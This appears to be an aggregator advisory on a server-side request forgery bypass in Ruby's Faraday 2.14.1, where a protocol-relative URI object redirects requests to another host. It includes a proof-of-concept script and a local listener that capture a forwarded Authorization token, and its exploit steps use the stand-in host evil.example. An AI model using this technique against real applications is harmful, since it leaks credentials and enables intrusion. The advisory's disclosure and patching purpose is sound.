Listen to this Post
How the CVE works:
Faraday versions before 2.14.1 contain an SSRF vulnerability in build_exclusive_url. The function uses Ruby’s `URImerge` to combine a fixed base URL with user input. According to RFC 3986, a protocol‑relative URL (e.g., //evil.com/path) is treated as a network‑path reference that overrides the host and scheme of the base URL. Because the existing path guard only blocks strings starting with a single slash "/", a string that begins with `”//”` bypasses this check entirely. The attacker can supply a protocol‑relative URI that redirects the request to an arbitrary external host while preserving any connection‑scoped headers (such as Authorization). This allows a remote user to perform off‑host request forgery (SSRF).
The fix released in Faraday 2.14.1 addressed the string‑based bypass, but did not cover the case where the request target is provided as a `URI` object instead of a String. Passing a `URI` object (e.g., URI("//evil.example/pwn")) to `conn.get(…)` or `req.url(…)` still allows host override, and the connection’s default headers are forwarded to the attacker‑controlled host. This bypass was confirmed against Faraday 2.14.1 by sending a `URI` object built from ["//127.0.0.1:4567", "/pwn"].join. The request was dispatched to the attacker’s host with the original `Authorization` header intact.
Because the vulnerable code path is triggered by a `URI` object rather than a string, applications that correctly sanitise string inputs may still be vulnerable if they pass a `URI` directly. The underlying cause is the same as the original SSRF – improper handling of protocol‑relative references – but the bypass exists because the patch for the string case was not applied to the `URI` input branch.
DailyCVE Form:
Platform: Ruby Faraday
Version: 2.14.1
Vulnerability: SSRF via URI
Severity: High
Date: 2026-02-09
Prediction: Patch 2026-03-01
What Undercode Say:
Analytics from the reveal the following commands and code fragments used to verify the bypass:
Start a local WEBrick listener to capture the request
ruby -e 'require "webrick"; server = WEBrick::HTTPServer.new(Port: 4567, BindAddress: "127.0.0.1", AccessLog: [], Logger: WEBrick::Log.new($stderr, WEBrick::Log::WARN)); server.mount_proc("/") { |req, res| res.status = 200; res.body = "host={req.host}\nauth={req["Authorization"]}\npath={req.path}\n" }; trap("INT") { server.shutdown }; server.start'
Proof‑of‑concept script that sends a URI object to trigger the bypass
require "faraday"
require "faraday/net_http"
conn = Faraday.new(url: "http://trusted.example/base", headers: {
"Authorization" => "Bearer secret-token"
}) { |f| f.adapter :net_http }
target = ["//127.0.0.1:4567", "/pwn"].join
resp = conn.get(URI(target))
puts resp.status => 200
puts resp.body => host=127.0.0.1, auth=Bearer secret-token, path=/pwn
How Exploit:
- An attacker controls any value that the application converts to a `URI` object (e.g., via
URI.parse(...)) and then passes toconn.get(...),conn.post(...), orreq.url(...). - The attacker supplies a protocol‑relative URI, such as
URI("//evil.example/pwn"). - Faraday merges this URI with the connection’s fixed base URL.
- The `URImerge` semantics treat `//evil.example/pwn` as a network‑path reference, overriding the original host and scheme.
- The request is sent to `evil.example` while the connection’s default headers (e.g.,
Authorization: Bearer secret‑token) are still attached.
Protection from this CVE:
- Upgrade Faraday to a version that corrects the handling of `URI` objects.
- For applications that cannot upgrade, avoid passing any user‑controlled input to Faraday’s request methods, whether as a string or a `URI` object.
- Validate and sanitise all external input that could become a path or URL; reject any value that contains `//` or that resolves to a different host.
- Use network‑level controls (e.g., firewall rules) to limit outbound requests to only trusted destinations.
Impact:
Successful exploitation allows a remote attacker to redirect requests from a trusted Faraday connection to an arbitrary host. Because connection‑scoped headers (such as Authorization, cookies, or custom tokens) are forwarded, the attacker may gain access to privileged resources or perform actions on behalf of the application. This can lead to data leakage, internal network probing, or further attacks against backend systems.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

